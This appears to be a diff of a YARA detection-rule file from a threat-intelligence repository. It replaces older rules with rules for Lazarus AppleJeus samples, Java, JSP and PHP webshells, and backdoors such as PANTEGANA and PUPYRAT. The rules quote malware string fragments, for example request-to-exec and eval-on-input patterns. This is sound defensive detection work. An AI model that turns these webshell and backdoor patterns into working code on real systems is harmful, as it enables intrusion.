"2021-09-02" + id = "f88e2253-e296-57d8-a627-6cb4ccff7a92" + date = "2022-11-03" + modified = "2022-12-01" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-24 - InkySquid Part 2/indicators/yara.yar#L1-L25" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L1-L16" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "30ae14fd55a3ab60e791064f69377f3b9de9b871adfd055f435df657f89f8007" + logic_hash = "46f3325a7e8e33896862b1971f561f4871670842aecd46bcc7a5a1af869ecdc4" score = 75 quality = 80 - tags = "INKYSQUID" - hash1 = "5bc52f6c1c0d0131cee30b4f192ce738ad70bcb56e84180f464a5125d1a784b2" + tags = "LAZARUS" + hash1 = "82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629" + memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $magic1 = "'https://update.microsoft.com/driverupdate?id=" ascii wide - $magic2 = "sVHZv1mCNYDO0AzI';" ascii wide - $magic3 = "firoffset..scupd.size" ascii wide - $magic4 = /alias UrlFilter[0-9]{2,5} eval;"/ - $s1 = "clRnbp9GU6oTZsRGZpZ" - $s2 = "RmlkZGxlOjpQb2ludGVy" - $s3 = "yVGdul2bQpjOlxGZklmR" - $s4 = "XZ05WavBlO6UGbkRWaG" + $s1 = "HijackingLib.dll" ascii condition: - any of ($magic*) or any of ($s*) + $s1 } -rule VOLEXITY_Apt_Py_Bluelight_Ldr : INKYSQUID +rule VOLEXITY_Apt_Win_Applejeus_B_Oct22 : LAZARUS { meta: - description = "Python Loader used to execute the BLUELIGHT malware family." + description = "Detected AppleJeus unpacked samples." author = "threatintel@volexity.com" - id = "f8da3e40-c3b0-5b7f-8ece-81874993d8cd" - date = "2021-06-22" - modified = "2021-09-02" + id = "8586dc64-225b-5f28-a6d6-b9b6e8f1c815" + date = "2022-11-03" + modified = "2022-12-01" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-24 - InkySquid Part 2/indicators/yara.yar#L27-L45" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L18-L41" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "e7e18a6d648b1383706439ba923335ac4396f6b5d2a3dc8f30f63ded7df29eda" + logic_hash = "76f3c9692ea96d3cadbbcad03477ab6c53445935352cb215152b9b5483666d43" score = 75 quality = 80 - tags = "INKYSQUID" - hash1 = "80269413be6ad51b8b19631b2f5559c9572842e789bbce031babe6e879d2e120" + tags = "LAZARUS" + hash1 = "9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78" + memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $s1 = "\"\".join(chr(ord(" ascii - $s2 = "import ctypes " ascii - $s3 = "ctypes.CFUNCTYPE(ctypes.c_int)" ascii - $s4 = "ctypes.memmove" ascii - $s5 = "python ended" ascii + $key1 = "AppX7y4nbzq37zn4ks9k7amqjywdat7d" + $key2 = "Gd2n5frvG2eZ1KOe" + $str1 = "Windows %d(%d)-%s" + $str2 = "&act=check" condition: - all of them + ( any of ($key*) and 1 of ($str*)) or all of ($str*) } -rule VOLEXITY_Apt_Win_Decrok : INKYSQUID +rule VOLEXITY_Apt_Win_Applejeus_C_Oct22 : LAZARUS { meta: - description = "The DECROK malware family, which uses the victim's hostname to decrypt and execute an embedded payload." + description = "Detected AppleJeus unpacked samples." author = "threatintel@volexity.com" - id = "dc83843d-fd2a-52f1-82e8-8e36b135a0c5" - date = "2021-06-23" - modified = "2021-09-02" + id = "6f467e0e-2932-5ba7-9fe3-0f9d28466e23" + date = "2022-11-03" + modified = "2022-12-01" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-24 - InkySquid Part 2/indicators/yara.yar#L47-L67" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L43-L63" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - hash = "6a452d088d60113f623b852f33f8f9acf0d4197af29781f889613fed38f57855" - logic_hash = "47fa03e95ac17ba7195858cd63b1769e5d56ab8a5edf872b345989b767050b87" + logic_hash = "566f5840ff2023f4fd8ffaa9ba1308a7012913cf587838173358b8f1fe4abca8" score = 75 quality = 80 - tags = "INKYSQUID" + tags = "LAZARUS" + hash1 = "a0db8f8f13a27df1eacbc01505f311f6b14cf9b84fbc7e84cb764a13f001dbbb" + memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $v1 = {C7 ?? ?? ?? 01 23 45 67 [2-20] C7 ?? ?? ?? 89 AB CD EF C7 ?? ?? ?? FE DC BA 98} - $av1 = "Select * From AntiVirusProduct" wide - $av2 = "root\\SecurityCenter2" wide - $funcformat = { 25 30 32 78 [0-10] 43 72 65 61 74 65 54 68 72 65 61 64 } + $str1 = "%sd.e%sc \"%s > %s 2>&1\"" wide + $str2 = "tuid" + $str3 = "content" + $str4 = "payload" + $str5 = "fconn" + $str6 = "Mozilla_%lu" condition: - all of them + 5 of them } -rule VOLEXITY_Apt_Win_Rokload : INKYSQUID +rule VOLEXITY_Apt_Win_Applejeus_D_Oct22 : LAZARUS { meta: - description = "A shellcode loader used to decrypt and run an embedded executable." + description = "Detected AppleJeus unpacked samples." author = "threatintel@volexity.com" - id = "229dbf3c-1538-5ecd-b5f8-8c9a9c81c515" - date = "2021-06-23" - modified = "2021-09-02" + id = "80d2821b-a437-573e-9e9d-bf79f9422cc9" + date = "2022-11-10" + modified = "2022-12-01" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-24 - InkySquid Part 2/indicators/yara.yar#L69-L83" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L65-L83" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - hash = "85cd5c3bb028fe6931130ccd5d0b0c535c01ce2bcda660a3b72581a1a5382904" - logic_hash = "8d65d32fd5bc055ca0e3831d3db88299e7c99f8547a170d3c53ec2c4001496a3" + logic_hash = "23c0642e5be15a75a39d089cd52f2f14d633f7af6889140b9ec6e53c5c023974" score = 75 quality = 80 - tags = "INKYSQUID" + tags = "LAZARUS" + hash1 = "a241b6611afba8bb1de69044115483adb74f66ab4a80f7423e13c652422cb379" + memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $bytes00 = { 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 57 41 54 41 55 41 56 41 57 48 ?? ?? ?? b9 ?? ?? ?? ?? 33 ff e8 ?? ?? ?? ?? b9 ?? ?? ?? ?? 4c 8b e8 e8 ?? ?? ?? ?? 4c 8b f0 41 ff d6 b9 ?? ?? ?? ?? 44 8b f8 e8 ?? ?? ?? ?? 4c 8b e0 e8 ?? ?? ?? ?? 48 } + $reg = "Software\\Bitcoin\\Bitcoin-Qt" + $pattern = "%s=%d&%s=%s&%s=%s&%s=%d" + $exec = " \"%s\", RaitingSetupUI " + $http = "Accept: */*" wide condition: - $bytes00 at 0 + all of them } -import "pe" - -rule VOLEXITY_Trojan_Win_Backwash_Cpp : XEGROUP +rule VOLEXITY_Cf_Office_Win_Macro_Lazarus_Jeus_B : LAZARUS { meta: - description = "CPP loader for the Backwash malware." + description = "Detects macros used by the Lazarus threat actor to distribute AppleJeus." author = "threatintel@volexity.com" - id = "8a1c4ff1-1827-5e6f-b838-664d8c3be840" - date = "2021-11-17" - modified = "2021-12-07" + id = "ac4d4e82-e29f-5134-999d-b8dcef59d285" + date = "2022-11-03" + modified = "2022-12-01" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L3-L20" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L85-L104" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "c8ed2d3103aa85363acd7f5573aeb936a5ab5a3bacbcf1f04e6b298299f24dae" + logic_hash = "e55199e6ad26894f98e930cd4716127ee868872d08ada1c44675e4db1ec27894" score = 75 quality = 80 - tags = "XEGROUP" - hash1 = "0cf93de64aa4dba6cec99aa5989fc9c5049bc46ca5f3cb327b49d62f3646a852" - memory_suitable = 1 + tags = "LAZARUS" + hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b" + memory_suitable = 0 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $s1 = "cor1dbg.dll" wide - $s2 = "XEReverseShell.exe" wide - $s3 = "XOJUMAN=" wide + $a1 = ", vbDirectory) = \"\" Then" ascii + $a2 = ".Caption & " ascii + $a3 = ".nodeTypedValue" ascii + $a4 = ".Application.Visible = False" ascii + $a5 = " MkDir (" ascii condition: - 2 of them + all of ($a*) } -import "pe" - -rule VOLEXITY_Trojan_Win_Iis_Shellsave : XEGROUP +rule VOLEXITY_Cf_Office_Win_Macro_Lazarus_Jeus : LAZARUS { meta: - description = "Detects an AutoIT backdoor designed to run on IIS servers and to install a webshell. This rule will only work against memory samples." + description = "Detects malicious documents used by Lazarus in a campaign dropping the AppleJeus malware." author = "threatintel@volexity.com" - id = "a89defa5-4b22-5650-a0c0-f4b3cf3377a7" - date = "2021-11-17" - modified = "2021-12-07" + id = "03d41314-c19f-566f-9571-48915a292433" + date = "2022-11-02" + modified = "2022-12-01" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L22-L40" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L106-L124" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "f34d6f4ecaa4cde5965f6b0deac55c7133a2be96f5c466f34775be6e7f730493" + logic_hash = "8e5a9042ec1ddaf4da511743434461c9865f259c30a9b02c28475b3a59fe4fc1" score = 75 quality = 80 - tags = "XEGROUP" - hash1 = "21683e02e11c166d0cf616ff9a1a4405598db7f4adfc87b205082ae94f83c742" + tags = "LAZARUS" + hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b" memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $s1 = "getdownloadshell" ascii - $s2 = "deleteisme" ascii - $s3 = "sitepapplication" ascii - $s4 = "getapplicationpool" ascii + $s1 = "0M8R4K" ascii + $s2 = "bin.base64" ascii + $s3 = "dragon" ascii + $s4 = "Workbook_Open" ascii + + condition: + 3 of ($s*) +} +rule VOLEXITY_Webshell_Java_Behinder_Shellservice : WEBSHELLS COMMODITY +{ + meta: + description = "Looks for artifacts generated (generally seen in .class files) related to the Behinder framework." + author = "threatintel@volexity.com" + id = "21c1e3e9-d048-5c60-9c21-8e54b27f359a" + date = "2022-03-18" + modified = "2022-07-28" + reference = "https://github.com/MountCloud/BehinderClientSource/blob/master/src/main/java/net/rebeyond/behinder/core/ShellService.java" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L1-L23" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "373a8d4ef81e9bbbf1f24ebf0389e7da4b73f88786cc8e1d286ccc9f4c36debc" + score = 75 + quality = 30 + tags = "WEBSHELLS, COMMODITY" + hash1 = "9a9882f9082a506ed0fc4ddaedd50570c5762deadcaf789ac81ecdbb8cf6eff2" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 1 + + strings: + $s1 = "CONNECT" ascii fullword + $s2 = "DISCONNECT" ascii fullword + $s3 = "socket_" ascii fullword + $s4 = "targetIP" ascii fullword + $s5 = "targetPort" ascii fullword + $s6 = "socketHash" ascii fullword + $s7 = "extraData" ascii fullword condition: all of them } -import "pe" +rule VOLEXITY_General_Java_Encoding_And_Classloader : WEBSHELLS GENERAL FILE +{ + meta: + description = "Identifies suspicious java-based files which have all the ingredients required for a webshell." + author = "threatintel@volexity.com" + id = "7de5449d-de70-5153-b1b1-8a995ac8b7a0" + date = "2022-04-07" + modified = "2022-07-28" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L25-L43" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "21c226b03451eb98a8be5b26a9f00169f16454ecd21d4131c9991b63d2e3c8cd" + score = 65 + quality = 80 + tags = "WEBSHELLS, GENERAL, FILE" + hash1 = "0d5dc54ef77bc18c4c5582dca4619905605668cffcccc3829e43c6d3e14ef216" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 0 -rule VOLEXITY_Trojan_Backwash_Iis_Scout : XEGROUP + strings: + $s1 = "javax.crypto.spec.SecretKeySpec" ascii + $s2 = "java/security/SecureClassLoader" ascii + $s3 = "sun.misc.BASE64Decoder" ascii + + condition: + filesize <50KB and all of them +} +rule VOLEXITY_Webshell_Php_Str_Replace_Create_Func : WEBSHELLS GENERAL FILE { meta: - description = "Simple backdoor which collects information about the IIS server it is installed on. It appears to the attacker refers to this components as 'XValidate' - i.e. to validate infected machines." + description = "Looks for obfuscated PHP shells where create_function() is obfuscated using str_replace and then called using no arguments." author = "threatintel@volexity.com" - id = "1f768b39-21a0-574d-9043-5104540003f7" - date = "2021-11-17" - modified = "2021-12-07" + id = "e0a5965c-54c3-5699-a45b-58f7152574dd" + date = "2022-04-04" + modified = "2022-07-28" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L42-L66" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L45-L73" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "18c4e338905ff299d75534006037e63a8f9b191f062cc97b0592245518015f88" + logic_hash = "6a9ded1f1a8e4b8ae5f3db06f71bec6e9f62b6126b7444408d6319a35ed23827" score = 75 quality = 80 - tags = "XEGROUP" - hash1 = "6f44a9c13459533a1f3e0b0e698820611a18113c851f763797090b8be64fd9d5" + tags = "WEBSHELLS, GENERAL, FILE" + hash1 = "c713d13af95f2fe823d219d1061ec83835bf0281240fba189f212e7da0d94937" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 0 + + strings: + $php = "<?php" + $s = "=str_replace(" ascii + $anon_func = "(''," ascii + + condition: + filesize <100KB and $php at 0 and for any i in (1..#s) : ( for any j in (1..#anon_func) : ( uint16be(@s[i]-2)== uint16be(@anon_func[j]-2))) +} +rule VOLEXITY_Trojan_Golang_Pantegana : COMMODITY +{ + meta: + description = "Detects PANTEGANA, a Golang backdoor used by a range of threat actors due to its public availability." + author = "threatintel@volexity.com" + id = "b6154165-68e0-5986-a0cf-5631d369c230" + date = "2022-03-30" + modified = "2022-07-28" + reference = "https://github.com/elleven11/pantegana" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L75-L99" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "791a664a6b4b98051cbfacb451099de085cbab74d73771709377ab68a5a23d2b" + score = 75 + quality = 80 + tags = "COMMODITY" + hash1 = "8297c99391aae918f154077c61ea94a99c7a339166e7981d9912b7fdc2e0d4f0" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 1 + + strings: + $s1 = "RunFingerprinter" ascii + $s2 = "SendSysInfo" ascii + $s3 = "ExecAndGetOutput" ascii + $s4 = "RequestCommand" ascii + $s5 = "bindataRead" ascii + $s6 = "RunClient" ascii + $magic = "github.com/elleven11/pantegana" ascii + + condition: + 5 of ($s*) or $magic +} +rule VOLEXITY_Trojan_Any_Pupyrat_B : COMMODITY +{ + meta: + description = "Detects the PUPYRAT malware family, a cross-platform RAT written in Python." + author = "threatintel@volexity.com" + id = "1da1e5ba-cf00-5935-b3d1-0ff2713b7e34" + date = "2022-04-07" + modified = "2022-07-28" + reference = "https://github.com/n1nj4sec/pupy" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L101-L134" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "65eebfea2338deed682693f048a88d46ea4621177acb77c0642583b0dc35c818" + score = 75 + quality = 80 + tags = "COMMODITY" + hash1 = "7474a6008b99e45686678f216af7d6357bb70a054c6d9b05e1817c8d80d536b4" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" memory_suitable = 1 + + strings: + $elf1 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" ascii + $elf2 = "reflective_inject_dll" fullword ascii + $elf3 = "ld_preload_inject_dll" fullword ascii + $pupy1 = "_pupy.error" ascii + $pupy2 = "_pupy" ascii + $pupy3 = "pupy://" ascii + $s1 = "Args not passed" ascii + $s2 = "Too many args" ascii + $s3 = "Can't execute" ascii + $s4 = "mexec:stdin" ascii + $s5 = "mexec:stdout" ascii + $s6 = "mexec:stderr" ascii + $s7 = "LZMA error" ascii + + condition: + any of ($elf*) or all of ($pupy*) or all of ($s*) +} +rule VOLEXITY_General_Php_Fileinput_Eval : WEBSHELLS GENERAL +{ + meta: + description = "Look for PHP files which use file_get_contents and then shortly afterwards use an eval statement." + author = "threatintel@volexity.com" + id = "c00d8fee-f667-5979-ad2a-dbb762544c2f" + date = "2021-06-16" + modified = "2022-07-28" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L136-L152" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "c61f0ee13007e398f45711354a1ca948f7f34893c9bcbdf845be932b63bd746d" + score = 75 + quality = 80 + tags = "WEBSHELLS, GENERAL" + hash1 = "1a34c43611ee310c16acc383c10a7b8b41578c19ee85716b14ac5adbf0a13bd5" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 0 strings: - $s1 = "SOAPRequest" ascii - $s2 = "requestServer" ascii - $s3 = "getFiles" ascii - $s4 = "APP_POOL_CONFIG" wide - $s5 = "<virtualDirectory" wide - $s6 = "stringinstr" ascii - $s7 = "504f5354" wide - $s8 = "XValidate" ascii - $s9 = "XEReverseShell" ascii - $s10 = "XERsvData" ascii + $s1 = "file_get_contents(\"php://input\");" + $s2 = "eval(" condition: - 6 of them + $s2 in (@s1[1]..@s1[1]+512) } -import "pe" +rule VOLEXITY_General_Php_Call_User_Func : GENERAL WEBSHELLS +{ + meta: + description = "Webshells using call_user_func against an object from a file input or POST variable." + author = "threatintel@volexity.com" + id = "48c7857e-7dda-5e3f-b82c-7d34c251f083" + date = "2021-06-16" + modified = "2022-07-28" + reference = "https://zhuanlan.zhihu.com/p/354906657" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L154-L170" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "46c999da97682023861e58f9cd2c8651480db990a0361c1985c6d5c35b5bf0ea" + score = 75 + quality = 80 + tags = "GENERAL, WEBSHELLS" + hash1 = "40b053a2f3c8f47d252b960a9807b030b463ef793228b1670eda89f07b55b252" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 0 -rule VOLEXITY_Web_Js_Xeskimmer : XEGROUP + strings: + $s1 = "@call_user_func(new C()" wide ascii + + condition: + $s1 +} +rule VOLEXITY_Webshell_Php_Icescorpion : COMMODITY WEBSHELL FILE { meta: - description = "Detects JScript code using in skimming credit card details." + description = "Detects the IceScorpion webshell." author = "threatintel@volexity.com" - id = "2c0911cf-a679-5d4e-baad-777745a28e27" - date = "2021-11-17" - modified = "2021-12-07" - reference = "https://github.com/MBThreatIntel/skimmers/blob/master/null_gif_skimmer.js" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L68-L97" + id = "dd165d67-375e-5d51-825a-45241345e268" + date = "2022-01-17" + modified = "2022-07-28" + reference = "https://www.codenong.com/cs106064226/" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L172-L190" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "cc46e9fab5f408fde13c3897d378a1a2e4acb448f40ca4935c19024ebdc252d7" + logic_hash = "0c75ec7cbbfdba8ce5f71a83d78caf19366954b84f304c1864e68bbe11a9a2df" score = 75 quality = 80 - tags = "XEGROUP" - hash1 = "92f9593cfa0a28951cae36755d54de63631377f1b954a4cb0474fa0b6193c537" + tags = "COMMODITY, WEBSHELL, FILE" + hash1 = "5af4788d1a61009361b37e8db65deecbfea595ef99c3cf920d33d9165b794972" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" memory_suitable = 0 + + strings: + $s1 = "[$i+1&15];" + $s2 = "openssl_decrypt" + + condition: + all of them and filesize <10KB +} +rule VOLEXITY_Webshell_Jsp_Godzilla : WEBSHELLS COMMODITY +{ + meta: + description = "Detects the JSP implementation of the Godzilla Webshell." + author = "threatintel@volexity.com" + id = "47c8eab8-84d7-5566-b757-5a6dcc7579b7" + date = "2021-11-08" + modified = "2022-08-10" + reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L1-L28" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "52cba9545f662da18ca6e07340d7a9be637b89e7ed702dd58cac545c702a00e3" + score = 75 + quality = 80 + tags = "WEBSHELLS, COMMODITY" + hash1 = "2786d2dc738529a34ecde10ffeda69b7f40762bf13e7771451f13a24ab7fc5fe" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 1 strings: - $s1 = ".match(/^([3456]\\d{14,15})$/g" ascii - $s2 = "^(p(wd|ass(code|wd|word)))" ascii - $b1 = "c('686569676874')" ascii - $b2 = "c('7769647468')" ascii - $c1 = "('696D67')" ascii - $c2 = "('737263')" ascii - $magic = "d=c.charCodeAt(b),a+=d.toString(16);" + $s1 = ".getWriter().write(base64Encode(" wide ascii + $s2 = ".getAttribute(" ascii wide + $s3 = "java.security.MessageDigest" ascii wide + $auth1 = /String xc=\"[a-f0-9]{16}\"/ ascii wide + $auth2 = "String pass=\"" ascii wide + $magic = "class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q" + $magic2 = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class" condition: - all of ($s*) or all of ($b*) or all of ($c*) or $magic + all of ($s*) or all of ($auth*) or any of ($magic*) } -import "pe" +rule VOLEXITY_Webshell_Jsp_General_Runtime_Exec_Req : GENERAL WEBSHELLS +{ + meta: + description = "Looks for a common design pattern in webshells where a request attribute is passed directly to exec()." + author = "threatintel@volexity.com" + id = "7f1539bd-a2f0-50dd-b500-ada4e0971d13" + date = "2022-02-02" + modified = "2022-08-10" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L30-L45" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "d3048aba80c1c39f1673931cd2d7c5ed83045603b0ad204073fd788d0103a6c8" + score = 75 + quality = 80 + tags = "GENERAL, WEBSHELLS" + hash1 = "4935f0c50057e28efa7376c734a4c66018f8d20157b6584399146b6c79a6de15" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 1 -rule VOLEXITY_Trojan_Win_Xe_Backwash : XEGROUP FILE + strings: + $s1 = "Runtime.getRuntime().exec(request." ascii + + condition: + $s1 +} +rule VOLEXITY_Webshell_Jsp_Regeorg : WEBSHELL COMMODITY { meta: - description = "The BACKWASH malware family, which acts as a reverse shell on the victim machine." + description = "Detects the reGeorg webshells' JSP version." author = "threatintel@volexity.com" - id = "93bbbf58-8ba2-565f-98f5-51d6f1a1ab06" - date = "2020-09-04" - modified = "2021-12-07" + id = "205ee383-4298-5469-a509-4ce3eaf9dd0e" + date = "2022-03-08" + modified = "2022-08-10" + reference = "https://github.com/SecWiki/WebShell-2/blob/master/reGeorg-master/tunnel.jsp" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L47-L70" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "cecb71605d9112d509823c26e40e1cf9cd6db581db448db5c9ffc63a2bfe529e" + score = 75 + quality = 80 + tags = "WEBSHELL, COMMODITY" + hash1 = "f9b20324f4239a8c82042d8207e35776d6777b6305974964cd9ccc09d431b845" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 1 + + strings: + $magic = "socketChannel.connect(new InetSocketAddress(target, port))" ascii + $a1 = ".connect(new InetSocketAddress" ascii + $a2 = ".configureBlocking(false)" ascii + $a3 = ".setHeader(" ascii + $a4 = ".getHeader(" ascii + $a5 = ".flip();" ascii + + condition: + $magic or all of ($a*) +} +rule VOLEXITY_Apt_Js_Sharpext : SHARPTONGUE +{ + meta: + description = "A malicious Chrome browser extention used by the SharpTongue threat actor to steal mail data from a victim." + author = "threatintel@volexity.com" + id = "61b5176a-ff73-5fce-bc70-c9e09bb5afed" + date = "2021-09-14" + modified = "2022-07-28" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - 